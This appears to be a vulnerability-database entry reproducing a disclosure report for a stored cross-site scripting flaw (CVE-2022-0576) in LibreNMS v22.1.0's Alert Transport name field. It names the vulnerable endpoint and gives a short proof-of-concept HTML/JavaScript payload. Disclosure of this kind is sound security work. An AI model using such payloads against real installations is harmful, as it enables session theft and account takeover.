Lucene search
Faisalfs10x114BA055-A2F0-4DB9-AAFB-95DF944BA177HistoryFeb 12, 2022 - 9:28 p.m.
Cross-site Scripting (XSS) - Generic in librenms/librenms
2022-02-1221:28:19
faisalfs10x
www.huntr.dev
14
0.001 Low
EPSS
Percentile
34.3%
Description
Cross-Site Scripting vulnerability in LibreNMS v22.1.0 which allows attackers to execute arbitrary javascript code which affected Alerts module (Alert Transport) in Transport name field.
Proof of Concept
Endpoint:
1 POST http://{HOST}/ajax_form.php - Parameter name
~
Payload:
'><body onload=alert("TName")>
~
XSS will fire-up by user visiting:
1 http://{HOST}/alert-transports
~
PoC images:
1 payload
Impact
This vulnerability is capable of running malicious javascript code on web pages, stealing a user’s cookie and gain unauthorized access to that user’s account through the stolen cookie.
Related
osv
osv
Cross-site Scripting in librenms
2022-02-15 00:02:47
CVE-2022-0576
2022-02-14 12:15:23
nvd
nvd
CVE-2022-0576
2022-02-14 12:15:23
cve
cve
CVE-2022-0576
2022-02-14 12:15:23
veracode
veracode
Cross-site Scripting (XSS)
2022-02-15 06:22:07
github
github
Cross-site Scripting in librenms
2022-02-15 00:02:47
prion
prion
Cross site scripting
2022-02-14 12:15:00
cvelist
cvelist
CVE-2022-0576 Cross-site Scripting (XSS) - Generic in librenms/librenms
2022-02-13 23:40:09